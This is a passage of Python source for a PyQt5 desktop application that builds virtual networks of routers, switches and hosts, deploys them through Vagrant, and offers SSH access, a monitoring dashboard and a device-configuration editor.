Vagrant\")\n self.main_toolbar()\n self.statusbar()\n self.setWindowIcon(QtGui.QIcon(\"./Images/network.png\"))\n self.main_frame = QtWidgets.QWidget()\n self.main_frame_layout = QtWidgets.QVBoxLayout(self.main_frame)\n self.setCentralWidget(self.main_frame)\n self.canvas_html()\n self.debug_console()\n self.network_wizard = new_network_wizard(self)\n self.editor_window = editor_components(self)\n self.dashboard_window = dashboard_vms(self)\n self.ssh_window = ssh_connection(self)\n self.edge_window = edge_editors(self)\n self.vagrant_process = QtCore.QProcess(self)\n self.dashboard_process = QtCore.QProcess(self)\n self.vagrant_process.readyReadStandardOutput.connect(self.onReadyReadStandardOutput)\n self.vagrant_process.readyReadStandardError.connect(self.onReadyReadStandardError)\n\n\n def center(self):\n \"\"\"Method that centers the main window depending on the user resolution.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n qr = self.frameGeometry()\n cp = QtWidgets.QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\n def main_toolbar(self):\n \"\"\"Method that defines the toolbar with all the corresponding button/actions.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\" \n self.main_toolbar = QtWidgets.QToolBar(self)\n self.addToolBar(QtCore.Qt.TopToolBarArea, self.main_toolbar)\n self.main_toolbar.setIconSize(QtCore.QSize(64,64))\n self.main_toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)\n \n 
self.button_router = QtWidgets.QAction(QtGui.QIcon(\"./Images/router.png\"), \"Label\", self)\n self.button_router.setStatusTip(\"Add a router to the network\")\n self.button_router.setToolTip(\"Add a router to the network\")\n self.button_router.setIconText(\"Router\")\n self.button_router.setDisabled(True)\n \n self.button_switch = QtWidgets.QAction(QtGui.QIcon(\"./Images/switch.png\"), \"Label\", self)\n self.button_switch.setStatusTip(\"Add a switch to the network\")\n self.button_switch.setToolTip(\"Add a switch to the network\")\n self.button_switch.setIconText(\"Switch\")\n self.button_switch.setDisabled(True)\n\n self.button_host = QtWidgets.QAction(QtGui.QIcon(\"./Images/host.png\"), \"Label\", self)\n self.button_host.setStatusTip(\"Add a host to the network\")\n self.button_host.setToolTip(\"Add a host to the network\")\n self.button_host.setIconText(\"Host\")\n self.button_host.setDisabled(True)\n\n self.button_other = QtWidgets.QAction(QtGui.QIcon(\"./Images/webserver.png\"), \"Label\", self)\n self.button_other.setStatusTip(\"Add an other tipology of device to the network\")\n self.button_other.setToolTip(\"Add an other tipology of device to the network\")\n self.button_other.setIconText(\"Other\")\n self.button_other.setDisabled(True)\n\n self.button_editor = QtWidgets.QAction(QtGui.QIcon(\"./Images/tool.png\"), \"Label\", self)\n self.button_editor.setStatusTip(\"Edit virtual network devices\")\n self.button_editor.setToolTip(\"Edit virtual network devices\")\n self.button_editor.setIconText(\"Edit configuration\")\n self.button_editor.triggered.connect(lambda: self.editor_window.show())\n self.button_editor.setDisabled(True)\n\n self.button_edge = QtWidgets.QAction(QtGui.QIcon(\"./Images/edge.png\"), \"Label\", self)\n self.button_edge.setStatusTip(\"Edit edge/link characteristics\")\n self.button_edge.setToolTip(\"Edit edge/link characteristics\")\n self.button_edge.setIconText(\"Edge configuration\")\n self.button_edge.triggered.connect(lambda: self.edge_window.show())\n self.button_edge.setDisabled(True)\n\n self.button_new = QtWidgets.QAction(QtGui.QIcon(\"./Images/newfile.png\"), \"Label\", self)\n self.button_new.setStatusTip(\"Create a new network\")\n self.button_new.setToolTip(\"Create a new network\")\n self.button_new.setIconText(\"New Network\")\n self.button_new.triggered.connect(lambda: self.network_wizard.show())\n\n self.button_save = QtWidgets.QAction(QtGui.QIcon(\"./Images/save.png\"), \"Label\", self)\n self.button_save.setStatusTip(\"Save the current network\")\n self.button_save.setToolTip(\"Save the current network\")\n self.button_save.setIconText(\"Save Network\")\n self.button_save.triggered.connect(lambda: self.save_file_window())\n self.button_save.setDisabled(True)\n\n self.button_open = QtWidgets.QAction(QtGui.QIcon(\"./Images/openfile.png\"), \"Label\", self)\n self.button_open.setStatusTip(\"Open an existent network\")\n self.button_open.setToolTip(\"Open an existent network\")\n self.button_open.setIconText(\"Open Network\")\n self.button_open.triggered.connect(lambda: self.open_file_window())\n\n self.button_vagrant = QtWidgets.QAction(QtGui.QIcon(\"./Images/vagrant.png\"), \"Label\", self)\n self.button_vagrant.setStatusTip(\"Deploy the virtual network via vagrant\")\n self.button_vagrant.setToolTip(\"Deploy the virtual network via vagrant\")\n self.button_vagrant.setIconText(\"Deploy network\")\n self.button_vagrant.triggered.connect(lambda: self.vagrant_execution())\n self.button_vagrant.setDisabled(True)\n\n self.button_dashboard = 
QtWidgets.QAction(QtGui.QIcon(\"./Images/dashboard.png\"), \"Label\", self)\n self.button_dashboard.setStatusTip(\"Open the statistics and control dashboard of the deployed network\")\n self.button_dashboard.setToolTip(\"Open the statistics and control dashboard of the deployed network\")\n self.button_dashboard.setIconText(\"Control dashboard\")\n self.button_dashboard.triggered.connect(lambda: self.dashboard_window.show())\n self.button_dashboard.setDisabled(True)\n\n self.button_ssh = QtWidgets.QAction(QtGui.QIcon(\"./Images/ssh.png\"), \"Label\", self)\n self.button_ssh.setStatusTip(\"Prompt for making an ssh connection to a specific node\")\n self.button_ssh.setToolTip(\"Prompt for making an ssh connection to a specific node\")\n self.button_ssh.setIconText(\"SSH Connection\")\n self.button_ssh.triggered.connect(lambda: self.ssh_window.show())\n self.button_ssh.setDisabled(True)\n\n self.button_terminal = QtWidgets.QAction(QtGui.QIcon(\"./Images/terminal.png\"), \"Label\", self)\n self.button_terminal.setStatusTip(\"Open the debug console\")\n self.button_terminal.setToolTip(\"Open the debug console\")\n self.button_terminal.setIconText(\"Debug console\")\n self.button_terminal.triggered.connect(lambda: self.debug_console_frame.setVisible(False) if self.debug_console_frame.isVisible() else self.debug_console_frame.setVisible(True))\n\n self.button_power = QtWidgets.QAction(QtGui.QIcon(\"./Images/switchoff_on.png\"), \"Label\", self)\n self.button_power.setStatusTip(\"Turn on/off any device of the network\")\n self.button_power.setToolTip(\"Turn on/off any device of the network\")\n self.button_power.setIconText(\"Turn on/off VMs\")\n self.button_power.triggered.connect(lambda: self.vagrant_halt())\n self.button_power.setDisabled(True)\n \n self.button_destroy = QtWidgets.QAction(QtGui.QIcon(\"./Images/bin.png\"), \"Label\", self)\n self.button_destroy.setStatusTip(\"Destroy the current deployed virtual machines\")\n self.button_destroy.setToolTip(\"Destroy the current deployed virtual machines\")\n self.button_destroy.setIconText(\"Destroy network\")\n self.button_destroy.triggered.connect(lambda: self.vagrant_destroy())\n self.button_destroy.setDisabled(True)\n \n self.main_toolbar.addAction(self.button_new)\n self.main_toolbar.addAction(self.button_save)\n self.main_toolbar.addAction(self.button_open)\n self.main_toolbar.addSeparator()\n self.main_toolbar.addAction(self.button_router)\n self.main_toolbar.addAction(self.button_switch)\n self.main_toolbar.addAction(self.button_host)\n self.main_toolbar.addAction(self.button_other)\n self.main_toolbar.addAction(self.button_editor)\n self.main_toolbar.addAction(self.button_edge)\n self.main_toolbar.addSeparator()\n self.main_toolbar.addAction(self.button_vagrant)\n self.main_toolbar.addAction(self.button_dashboard)\n self.main_toolbar.addAction(self.button_ssh)\n self.main_toolbar.addAction(self.button_terminal)\n self.main_toolbar.addAction(self.button_power)\n self.main_toolbar.addAction(self.button_destroy)\n\n\n def statusbar(self):\n \"\"\"Method that defines the statusbar at the bottom of the main window. 
This status bar is used to prompt hints or low priority messages from the application.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n self.statusBar().showMessage(\"No deployed network\")\n\n\n def enable_buttons_editing(self):\n self.button_save.setEnabled(True)\n self.button_vagrant.setEnabled(True)\n self.button_editor.setEnabled(True)\n self.button_edge.setEnabled(True)\n \n \n def canvas_html(self):\n \"\"\"Method that defines the canvas where the network is prompted.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n QtWebEngineWidgets.QWebEngineSettings.ShowScrollBars=False\n self.canvas_frame = QtWebEngineWidgets.QWebEngineView()\n self.main_frame_layout.addWidget(self.canvas_frame)\n \n \n \n def update_canvas_html(self, html_path):\n \"\"\"Method that updates the content of the canvas with a different html network file.\n\n Parameters:\n - self: current instance of the class;\n - html_path: absolute path of the html network file.\n \"\"\"\n self.canvas_frame.load(QtCore.QUrl.fromLocalFile(html_path))\n \n \n def open_file_window(self):\n \"\"\"Method that prompt an explorer window for opening a new html network file.\n\n Parameters:\n - self: current instance of the class.\n \"\"\"\n file_path = QtWidgets.QFileDialog.getOpenFileName(self, 'OpenFile')\n if(len(file_path) > 2):\n self.current_network = network_core.open_network(file_path[0])\n self.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.current_network_path = os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n self.editor_window = editor_components(self)\n self.dashboard_window = dashboard_vms(self)\n self.edge_window = edge_editors(self)\n self.enable_buttons_editing()\n \n \n def save_file_window(self):\n file_path = QtWidgets.QFileDialog.getSaveFileName(self, 'SaveFile')\n self.current_network.save_graph(file_path[0])\n\n def debug_console(self):\n self.debug_console_frame = QtWidgets.QWidget(self.main_frame)\n self.debug_console_layout = QtWidgets.QVBoxLayout()\n self.debug_console_frame.setLayout(self.debug_console_layout)\n self.debug_console_textedit = QtWidgets.QPlainTextEdit()\n self.debug_console_textedit.setReadOnly(True)\n self.debug_console_frame.move(5,430)\n self.debug_console_frame.setMinimumHeight(220)\n self.debug_console_frame.setMinimumWidth(1320)\n self.debug_console_textedit.resize(self.debug_console_textedit.sizeHint().width(), self.debug_console_textedit.minimumHeight())\n self.debug_console_textedit.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)\n self.debug_console_label = QtWidgets.QLabel(\"Debug console\")\n self.debug_console_layout.addWidget(self.debug_console_label)\n self.debug_console_layout.addWidget(self.debug_console_textedit)\n self.debug_console_frame.hide()\n\n def vagrant_execution(self):\n os.chdir(\"./NetworkGraphs\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant up')\n os.chdir(\"..\")\n os.mkdir(self.current_network_name)\n os.chdir(\"./\" + self.current_network_name)\n print(\"./\" + self.current_network_name)\n print(self.current_network_template)\n vagrantConverterCollector.converter_selector(self.current_network_path, self.current_network_template)\n self.debug_console_textedit.clear()\n self.vagrant_process.start('vagrant up')\n self.vm_power = 1\n \n self.button_vagrant.setDisabled(True)\n self.button_dashboard.setEnabled(True)\n self.button_destroy.setEnabled(True)\n self.button_ssh.setEnabled(True)\n 
self.button_power.setEnabled(True)\n self.button_power.setIconText(\"Turn off VMs\")\n\n def vagrant_halt(self):\n if(self.vm_power == 1):\n self.vagrant_process.start('vagrant halt')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant halt')\n self.vm_power = 0\n os.chdir(\"..\")\n os.chdir(\"./\" + self.current_network_name)\n self.button_power.setIconText(\"Turn on VMs\")\n else:\n self.vagrant_process.start('vagrant up')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant up')\n self.vm_power = 1\n os.chdir(\"..\")\n os.chdir(\"./\" + self.current_network_name)\n self.button_power.setIconText(\"Turn off VMs\")\n\n\n def vagrant_destroy(self):\n self.vagrant_process.start('vagrant destroy -f')\n os.chdir(\"..\")\n os.chdir(\"./Dashboard_Server\")\n self.dashboard_process.start('vagrant destroy -f')\n self.vm_power = 0\n self.button_dashboard.setDisabled(True)\n self.button_vagrant.setEnabled(True)\n self.button_destroy.setDisabled(True)\n self.button_ssh.setDisabled(True)\n self.button_power.setDisabled(True)\n \n\n def onReadyReadStandardOutput(self):\n result = self.vagrant_process.readAllStandardOutput().data().decode()\n self.debug_console_textedit.appendPlainText(result)\n self.outputSignal.emit(result)\n \n def onReadyReadStandardError(self):\n error = self.vagrant_process.readAllStandardError().data().decode()\n self.debug_console_textedit.appendPlainText(error)\n self.errorSignal.emit(error)\n \n \nclass new_network_wizard(QtWidgets.QWizard):\n \"\"\"\n Class from which it is possible to instantiate the wizard window. \n From this wizard it is possible to create a new network from scratch or from an existing template.\n\n \"\"\"\n\n def __init__(self, main_window):\n \"\"\"Default method that initializes the instance of the main_window.\n\n Parameters:\n - self: current instance of the class;\n - main_window: reference of the main window calling instance.\n \n Attributes:\n - main_window_object: reference of the object that has istantiated an object from this class;\n - templates_directory_path: absolute path of the template directory used in the wizard selection;\n - page_start, group_buttons: starting page object of the wizard and its buttons choice;\n - scratch_page: scratch page object where it is possible to insert the details for creating a network from scratch;\n - scratch_id: scratch page id;\n - template_page: template page object where it is possible to insert the details for creating a network from a template;\n - template_id: template page id;\n\n \"\"\"\n super(new_network_wizard, self).__init__()\n self.main_window_object = main_window\n self.templates_directory_path = os.path.abspath(\"./NetworkGraphs/Template\")\n self.page_start, self.group_buttons = self.page_network_source()\n self.setWindowIcon(QtGui.QIcon(\"./Images/plus.png\"))\n self.addPage(self.page_start)\n self.scratch_page = self.page_network_scratch()\n self.scratch_page.setFinalPage(True)\n self.scratch_id = self.addPage(self.scratch_page)\n self.template_page = self.page_network_template()\n self.template_id = self.addPage(self.template_page)\n self.currentIdChanged.connect(self.hide_next)\n self.button(QtWidgets.QWizard.FinishButton).clicked.connect(self.onFinish)\n self.setWizardStyle(QtWidgets.QWizard.ModernStyle)\n self.setWindowTitle(\"New virtual network\")\n self.resize(640,540)\n\n def hide_next(self):\n \"\"\"Method that hides the default next button on a specific wizard page.\n\n Parameters:\n - self: 
current instance of the class.\n\n \"\"\"\n if self.currentPage() == self.scratch_page:\n self.button(QtWidgets.QWizard.NextButton).hide()\n\n def nextId(self):\n \"\"\"Method that retrieves the next wizard page ID. This method is crucial for the tree structure of the wizard.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n choice = self.group_buttons.checkedButton().text()\n if self.currentPage() == self.page_start:\n if \"Create\" in choice:\n return self.scratch_id\n return self.template_id\n return QtWidgets.QWizard.nextId(self) \n \n def page_network_source(self):\n \"\"\"Method that initializes the wizard page from which it is possible to choose the source of the new network.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"Choose your starting point\")\n label = QtWidgets.QLabel(\"Select if you want to start from a template network or from scratch:\")\n group_radiobutton = QtWidgets.QButtonGroup(page)\n radiobutton_option1 = QtWidgets.QRadioButton(\"Create a new network from scratch\")\n group_radiobutton.addButton(radiobutton_option1)\n radiobutton_option1.setChecked(True)\n radiobutton_option2 = QtWidgets.QRadioButton(\"Import a network from a template\")\n radiobutton_option2.setChecked(False)\n group_radiobutton.addButton(radiobutton_option2)\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(label)\n layout.addWidget(radiobutton_option1)\n layout.addWidget(radiobutton_option2)\n page.setLayout(layout)\n return page, group_radiobutton\n\n def page_network_scratch(self):\n \"\"\"Method that initializes the wizard page from which it is possible to create a network from scratch by inputting the new network name.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"New network from scratch\")\n label = QtWidgets.QLabel(\"Insert the following details of your new virtual network:\")\n layout = QtWidgets.QFormLayout(page)\n textbox_label = QtWidgets.QLabel(\"Insert the network name:\")\n textbox_name = QtWidgets.QLineEdit(page)\n textbox_layout = QtWidgets.QHBoxLayout()\n textbox_layout.addWidget(textbox_label)\n textbox_layout.addWidget(textbox_name)\n layout.addRow(label)\n layout.addRow(textbox_layout)\n page.registerField(\"network_name_scratch\", textbox_name)\n return page\n\n def page_network_template(self):\n \"\"\"Method that initializes the wizard page from which it is possible to create a network from template by inputting the new network name and choosing a network template.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\" \n page = QtWidgets.QWizardPage(self)\n page.setTitle(\"New network from template\")\n templates_list = [ f for f in os.listdir(self.templates_directory_path) if os.path.isfile(os.path.join(self.templates_directory_path,f)) ]\n label = QtWidgets.QLabel(\"Select the starting template for your new virtuale network:\")\n textbox_label = QtWidgets.QLabel(\"Insert the network name:\")\n textbox_name = QtWidgets.QLineEdit(page)\n templates_combobox = QtWidgets.QComboBox(page)\n for template in templates_list:\n templates_combobox.addItem(template)\n preview_frame = QtWebEngineWidgets.QWebEngineView(page)\n preview_frame.load(QtCore.QUrl.fromLocalFile(self.templates_directory_path + \"/\" + str(templates_combobox.currentText())))\n preview_frame.setFixedSize(600,350)\n preview_frame.setZoomFactor(0.65)\n preview_frame.page().runJavaScript(\"window.scrollTo(100,100)\")\n 
templates_combobox.activated[str].connect(lambda: preview_frame.load(QtCore.QUrl.fromLocalFile(self.templates_directory_path + \"/\" + str(templates_combobox.currentText()))))\n layout = QtWidgets.QFormLayout(page)\n layout.addRow(label)\n layout.addRow(templates_combobox)\n textbox_layout = QtWidgets.QHBoxLayout()\n textbox_layout.addWidget(textbox_label)\n textbox_layout.addWidget(textbox_name)\n layout.addRow(textbox_layout)\n layout.addRow(preview_frame)\n page.registerField(\"network_name\", textbox_name)\n page.registerField(\"network_path\", templates_combobox, \"currentText\")\n return page\n \n def onFinish(self):\n \"\"\"Method called when the finish button of the wizard is pushed. It creates a new network based on the user choices and makes it available on the main editor.\n\n Parameters:\n - self: current instance of the class.\n\n \"\"\"\n if self.currentId() == self.template_id:\n template_path = self.templates_directory_path + \"/\" + self.template_page.field(\"network_path\")\n self.main_window_object.current_network_template = template_path.split(\"/\")[len(template_path.split(\"/\"))-1].split(\"_\")[0]\n self.main_window_object.current_network = network_core.open_network(template_path)\n self.main_window_object.current_network_name = self.template_page.field(\"network_name\")\n self.main_window_object.update_canvas_html(os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\"))\n self.main_window_object.current_network_path = os.path.abspath(\"./NetworkGraphs/Temp_Network/temp_network.html\")\n self.main_window_object.editor_window = editor_components(self.main_window_object)\n self.main_window_object.dashboard_window = dashboard_vms(self.main_window_object)\n self.main_window_object.ssh_window = ssh_connection(self.main_window_object)\n self.main_window_object.edge_window = edge_editors(self.main_window_object)\n self.main_window_object.enable_buttons_editing()\n else:\n print(self.scratch_page.field(\"network_name_scratch\"))\n self.main_window_object.current_network_name = self.template_page.field(\"network_path\")\n\n\nclass ssh_connection(QtWidgets.QMainWindow):\n\n def __init__(self, main_window):\n super(ssh_connection, self).__init__()\n self.main_window_object = main_window\n self.layout = QtWidgets.QVBoxLayout(self)\n self.setWindowTitle(\"SSH Connection to a node\")\n self.setWindowIcon(QtGui.QIcon(\"./Images/ssh.png\"))\n self.label_combobox = QtWidgets.QLabel(\"Select the virtual machine:\")\n self.vm_combobox = QtWidgets.QComboBox()\n self.vm_names()\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_ssh = QtWidgets.QPushButton(\"SSH Connection\")\n self.button_ssh.clicked.connect(self.ssh_connection)\n self.button_cancel = QtWidgets.QPushButton(\"Cancel\")\n self.button_layout.addWidget(self.button_ssh)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.layout.addWidget(self.label_combobox)\n self.layout.addWidget(self.vm_combobox)\n self.layout.addWidget(self.button_frame)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.layout)\n #self.window.setMinimumWidth(200)\n #self.window.setFixedWidth(200)\n self.setCentralWidget(self.window)\n self.setMinimumWidth(400)\n\n def ssh_connection(self):\n current_vm = self.vm_combobox.currentText()\n command = \"start cmd /k vagrant ssh \" + current_vm\n os.system(command)\n \n def vm_names(self):\n nodes = 
self.main_window_object.current_network.nodes\n for node in nodes:\n self.vm_combobox.addItem(node[\"label\"])\n\n\nclass dashboard_vms(QtWidgets.QMainWindow):\n\n def __init__(self, main_window):\n super(dashboard_vms, self).__init__()\n self.resize(1274, 768)\n self.setWindowIcon(QtGui.QIcon(\"./Images/dashboard.png\"))\n self.setWindowTitle(\"Dashboard statics monitoring\")\n self.browser = QtWebEngineWidgets.QWebEngineView()\n self.browser.setUrl(QtCore.QUrl(\"http://127.0.0.1:3000/d/sF7d-FHZz/dashboard-network-nodes-monitoring?orgId=1&refresh=1m\"))\n self.setCentralWidget(self.browser)\n\n\nclass editor_components(QtWidgets.QMainWindow):\n \"\"\"\n Class from which it is possible to instantiate the device editor window. \n This window contains all the details of each component that can be changed in order to create a new configuration.\n\n \"\"\"\n def __init__(self, main_window):\n \"\"\"Default method that initializes the instance of the device editor window.\n\n Parameters:\n - self: current instance of the class;\n - main_window: reference of the main window calling instance.\n\n Attributes:\n - main_window_object: reference of the object that has istantiated an object from this class;\n - tabs: tab collection object;\n - routers: list of routers from the current network;\n - swithces: list of switches from the current network;\n - hosts: list of hosts from the current network;\n - router_tab: tab form object where it is possible to edit routers configuration;\n - switch_tab: tab form object where it is possible to edit switches configuration;\n - host_tab: tab form object where it is possible to edit hosts configuration;\n - button_frame: frame object where all the buttons of the editor window are located;\n - button_layout: layout object for the buttons;\n - button_save: button object for saving the configuration;\n - button_cancel: button object for deleting the changes;\n - window: generic widget object that contains all the other widgets.\n\n \"\"\" \n super(editor_components, self).__init__()\n self.main_window_object = main_window\n self.temporary_network = self.main_window_object.current_network\n #print(self.temporary_network.nodes)\n self.resize(1024, 768)\n self.setWindowTitle(\"Editor virtual devices configuration\")\n self.setWindowIcon(QtGui.QIcon(\"./Images/network.png\"))\n self.tabs = QtWidgets.QTabWidget()\n self.routers = network_core.nodes_search_type(self.temporary_network, \"router\")\n self.switches = network_core.nodes_search_type(self.temporary_network, \"switch\")\n self.hosts = network_core.nodes_search_type(self.temporary_network, \"host\")\n self.others = network_core.nodes_search_type(self.temporary_network, \"others\")\n self.router_tab = self.editor_form(\"Router\", self.routers)\n self.switch_tab = self.editor_form(\"Switch\", self.switches)\n self.host_tab = self.editor_form(\"Host\", self.hosts)\n self.other_tab = self.editor_form(\"Other\", self.others)\n self.tabs.resize(1000,700)\n self.tabs.addTab(self.router_tab, \"Routers\")\n self.tabs.addTab(self.switch_tab, \"Switches\")\n self.tabs.addTab(self.host_tab, \"Hosts\")\n self.tabs.addTab(self.other_tab, \"Others\")\n self.layout = QtWidgets.QVBoxLayout(self)\n self.layout.addWidget(self.tabs)\n self.button_frame = QtWidgets.QWidget()\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignRight)\n self.button_save = QtWidgets.QPushButton(\"Save\")\n self.button_save.clicked.connect(self.on_save)\n self.button_cancel = 
QtWidgets.QPushButton(\"Cancel\")\n self.button_cancel.clicked.connect(self.on_cancel)\n self.button_layout.addWidget(self.button_save)\n self.button_layout.addWidget(self.button_cancel)\n self.button_frame.setLayout(self.button_layout)\n self.layout.addWidget(self.button_frame)\n self.window = QtWidgets.QWidget()\n self.window.setLayout(self.layout)\n self.setCentralWidget(self.window)\n \n def editor_form(self, type, devices):\n \"\"\"Method that initializes a form which contains all the widgets from which it is possible to change the device configuration.\n\n Parameters:\n - self: current instance of the class;\n - type: type of the devices to be edit.\n \n Returns:\n - tab: QTab widget object that contains the initialized form of all the devices of the specific type.\n\n \"\"\"\n tab = QtWidgets.QWidget()\n edit_lines = {}\n if len(devices) > 0:\n window_layout = QtWidgets.QVBoxLayout(tab)\n form = QtWidgets.QGroupBox(type + \" configuration\")\n form.setFixedSize(1000, 700)\n form_layout = QtWidgets.QGridLayout(self)\n form.setLayout(form_layout)\n form.setAlignment(QtCore.Qt.AlignTop)\n devices_label = QtWidgets.QLabel(\"Select the device to be configured:\")\n devices_combobox = QtWidgets.QComboBox()\n for device in devices:\n devices_combobox.addItem(device[\"label\"])\n \n devices_combobox.setItemText\n form_0_0 = QtWidgets.QWidget()\n form_0_0_layout = QtWidgets.QHBoxLayout()\n form_0_0.setLayout(form_0_0_layout)\n edit_lines[\"device_name_box\"] = QtWidgets.QLineEdit()\n edit_lines[\"device_name_box\"].textChanged[str].connect(lambda: (self.temporary_edits(\"label\", edit_lines[\"device_name_box\"].text(), devices, devices_combobox.currentIndex()), devices_combobox.setItemText(devices_combobox.currentIndex(), edit_lines[\"device_name_box\"].text())))\n \n form_0_0_layout.addWidget(QtWidgets.QLabel(\"Device name:\"))\n form_0_0_layout.addWidget(edit_lines[\"device_name_box\"])\n \n form_0_1 = QtWidgets.QWidget()\n form_0_1_layout = QtWidgets.QHBoxLayout()\n form_0_1.setLayout(form_0_1_layout)\n edit_lines[\"vm_image\"] = QtWidgets.QLineEdit()\n edit_lines[\"vm_image\"].textChanged[str].connect(lambda: (self.temporary_edits(\"vm_image\", edit_lines[\"vm_image\"].text(), devices, devices_combobox.currentIndex())))\n form_0_1_layout.addWidget(QtWidgets.QLabel(\"Image OS: \"))\n form_0_1_layout.addWidget(edit_lines[\"vm_image\"])\n \n \n form_layout.addWidget(form_0_0, 0, 0)\n form_layout.addWidget(form_0_1, 0, 1)\n \n \n form_1_0 = QtWidgets.QWidget()\n form_1_0_layout = QtWidgets.QHBoxLayout()\n form_1_0.setLayout(form_1_0_layout)\n edit_lines[\"ram\"] = QtWidgets.QLineEdit()\n edit_lines[\"ram\"].textChanged[str].connect(lambda: (self.temporary_edits(\"ram\", edit_lines[\"ram\"].text(), devices, devices_combobox.currentIndex())))\n form_1_0_layout.addWidget(QtWidgets.QLabel(\"RAM (MB): \"))\n form_1_0_layout.addWidget(edit_lines[\"ram\"])\n \n form_1_1 = QtWidgets.QWidget()\n form_1_1_layout = QtWidgets.QHBoxLayout()\n form_1_1.setLayout(form_1_1_layout)\n edit_lines[\"number_cpus\"] = QtWidgets.QLineEdit()\n edit_lines[\"number_cpus\"].textChanged[str].connect(lambda: (self.temporary_edits(\"n_cpus\", edit_lines[\"number_cpus\"].text(), devices, devices_combobox.currentIndex()))) \n form_1_1_layout.addWidget(QtWidgets.QLabel(\"Number of CPUs:\"))\n form_1_1_layout.addWidget(edit_lines[\"number_cpus\"])\n \n form_layout.addWidget(form_1_0, 1, 0)\n form_layout.addWidget(form_1_1, 1, 1)\n \n form_layout.addWidget(QtWidgets.QLabel(\"Network configuration:\"), 2, 0)\n \n 
network_configuration_table = QtWidgets.QTableWidget()\n network_configuration_table.setColumnCount(3)\n network_configuration_table_header = network_configuration_table.horizontalHeader()\n network_configuration_table_header.setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n network_configuration_table.setHorizontalHeaderLabels([\"Ip Address\", \"Netmask\", \"Interface\"])\n network_configuration_table.verticalHeader().hide()\n form_layout.addWidget(network_configuration_table, 3, 0, 1, 2)\n\n form_layout.addWidget(QtWidgets.QLabel(\"Custom script:\"), 4, 0)\n \n custom_script_textbox = QtWidgets.QTextEdit()\n form_layout.addWidget(custom_script_textbox, 5,0,1,2)\n custom_script_textbox.textChanged.connect(lambda: (self.temporary_edits(\"custom_script\", custom_script_textbox.toPlainText(), devices, devices_combobox.currentIndex())))\n\n\n self.set_qlines_text(edit_lines, devices, devices_combobox.currentIndex(), custom_script_textbox)\n self.set_network_table_content(network_configuration_table, devices, devices_combobox.currentIndex())\n network_configuration_table.cellChanged.connect(lambda: self.table_edits(network_configuration_table, devices, devices_combobox.currentIndex())) \n devices_combobox.activated[str].connect(lambda: (self.set_qlines_text(edit_lines, devices, devices_combobox.currentIndex(), custom_script_textbox), self.set_network_table_content(network_configuration_table, devices, devices_combobox.currentIndex())))\n\n window_layout.addWidget(devices_label)\n window_layout.addWidget(devices_combobox)\n window_layout.addWidget(form)\n else:\n tab_layout = QtWidgets.QVBoxLayout(tab)\n tab_layout.addWidget(QtWidgets.QLabel(\"No \" + type.lower() + \" devices available in the network\"))\n return tab\n\n def set_qlines_text(self, edit_lines, devices, index, custom_script_textbox):\n \"\"\"Method that applies all the current configuration values in the specific form.\n\n Parameters:\n - self: current instance of the class;\n - edit_lines: all the textboxes that contains the input from the user;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n edit_lines[\"device_name_box\"].setText(devices[index][\"label\"])\n edit_lines[\"vm_image\"].setText(devices[index][\"vm_image\"])\n edit_lines[\"ram\"].setText(devices[index][\"ram\"])\n edit_lines[\"number_cpus\"].setText(str(devices[index][\"n_cpus\"]))\n custom_script_textbox.setPlainText(devices[index][\"custom_script\"])\n\n \n def set_network_table_content(self, table, devices, index):\n \"\"\"Method that applies all the current configuration values in the specific network configuration table.\n\n Parameters:\n - self: current instance of the class;\n - table: table that contains all the network interfaces configured in the current device;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n network_row_count = len(devices[index][\"network_interfaces\"])\n table.setRowCount(network_row_count)\n network_column_count = len(devices[index][\"network_interfaces\"][0])\n \n for row in range(network_row_count):\n for column in range(network_column_count-1):\n item = (list(devices[index][\"network_interfaces\"][row].values())[column])\n table.setItem(row, column, QtWidgets.QTableWidgetItem(item))\n \n def temporary_edits(self, key, new_value, devices, index):\n \"\"\"Method called whenever a textbox content is modified. 
Every change is directly applied also to the temporary reference dictionary.\n\n Parameters:\n - self: current instance of the class;\n - key: characteristic that has been modified;\n - new_value: modified value;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n if key == \"n_cpus\":\n if new_value == \"\":\n devices[index][key] = 0\n else:\n devices[index][key] = int(new_value)\n else:\n devices[index][key] = new_value\n \n def table_edits(self, table, devices, index):\n \"\"\"Method called whenever a cell of the network table is modified. Every change is directly applied also to the temporary reference dictionary.\n\n Parameters:\n - self: current instance of the class;\n - table: table where the change has been made;\n - devices: temporary dictionary;\n - index: current device index.\n\n \"\"\"\n if (type(table.currentItem()) != type(None)):\n if (table.currentItem().column()==0):\n devices[index][\"network_interfaces\"][table.currentItem().row()][\"ip_address\"] = table.currentItem().text()\n if (table.currentItem().column()==1):\n 